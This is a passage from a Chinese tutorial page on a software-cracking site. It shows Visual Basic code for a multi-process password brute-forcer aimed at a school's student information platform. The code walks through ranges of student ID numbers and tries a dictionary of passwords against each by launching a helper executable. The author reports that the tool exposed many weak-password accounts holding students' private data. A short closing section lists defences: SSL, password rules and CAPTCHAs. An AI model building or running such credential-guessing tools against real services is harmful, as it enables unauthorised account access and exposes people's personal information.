|TAG标签|网站地图设为首页】【加入收藏

免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

热门标签

当前位置: 主页 > 系统综合 > 软件破解 > VB多进程实现快速web暴力破解(3)

VB多进程实现快速web暴力破解(3)

时间:2011-12-20 17:15来源:未知 整理:寂涯网络 点击:


    TimerRun(2).Enabled = True
    TimerRun(3).Enabled = True
    TimerRun(4).Enabled = True
    TimerShowResult.Enabled = True
End Sub
Private Sub Form_Load()
    If Me.Caption <> "XXXX 【校园信息平台】 娃娃猎手  -- By 冰域剑客" Then
       End
    End If
Call SkinH_Attach      '启用皮肤
 
    '从文件 password.dic载入密码列表到LstPass控件
    Dim OneLine As String
    Open App.Path & "\password.dic" For Input As #1

While Not EOF(1)
Line Input #1, OneLine
LstPass.AddItem Trim(OneLine)
    Wend
    Close #1
End Sub
Private Sub TimerRun_Timer(Index As Integer)
    TimerRun(Index).Enabled = False
    '如果一个学号已经测试完毕
    If CurPos > LstPass.ListCount - 1 Then
        If StuNo >= TxtUserId2 Then
            LblProgress.Caption = "破解完毕."
            CmdStart.Enabled = True
            TimerShowResult.Enabled = False
            Call TimerShowResult_Timer
        Else
            '继续破解下一个学号
            StuNo = StuNo + 1
            CurPos = 0            '密码索引置0
            TimerRun(Index).Enabled = True
        End If
    Else
        '如果一个学号还没有测试完毕,继续测试下一个密码
        LblProgress.Caption = " 正在测试 :  " & StuNo & Space(5) &
LstPass.List(CurPos)
        'Debug.Print StuNo & vbTab & LstPass.List(CurPos)
        Shell Chr(34) & App.Path & "\Thread.exe" & Chr(34) & " " & StuNo & ","
& LstPass.List(CurPos)
        CurPos = CurPos + 1
        TimerRun(Index).Enabled = True
End If
End Sub
Private Sub TimerShowResult_Timer()
    If Dir(App.Path & "\temp.out") <> "" Then
        '读入文件temp.out中的内容,并现实到TxtResult文本框中
        Dim rText As String
        Dim FSO As Object
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Dim mFile As Object
        Set mFile = FSO.opentextfile(App.Path & "\temp.out", 1, True)
        rText = mFile.readall  

   TxtResult.Text = rText
  Set FSO = Nothing
    End If
End Sub

   到此编码结束,测试程序,在已知存在的学号范围内,存在大量弱口令账号,这将导致
大批学生个人信息泄露。

本文小结  

通过校园信息平台可以查看学生的完整个人信息,它是非常隐私的。为防止被暴力破解,
可以做以下来三点工作:首先,对于使用 http 方式访问的 web 请求,不应予以回应,强制
使用 SSL 加密传输。第二,学生设置密码时严格要求密码强度, 必须为字母+数字+特殊符号,
否则不予通过。第三,增加验证码。相信通过以上三点,校园信息平台的安全性会得到很大
提高。
本文介绍了通过创建多进程的方法实现快速WEB 暴力破解,它也有明显的不足,系统每
次都需要将 Thread.exe 重新载入内存,编译过后的 Thread.exe 有 20KB,这是一种极大的

本页地址 http://www.jybase.net/ruanjianpojie/20111218722.html

百度搜索更多

谷歌搜索更多

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片

快速评论

    推荐内容
    赞助商
    热点内容
    赞助商
    

    关于本站免责声明视频更新google百度地图视频地图RRS订阅

    如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com

    Copyright © 2010-2012 寂涯网络 版权所有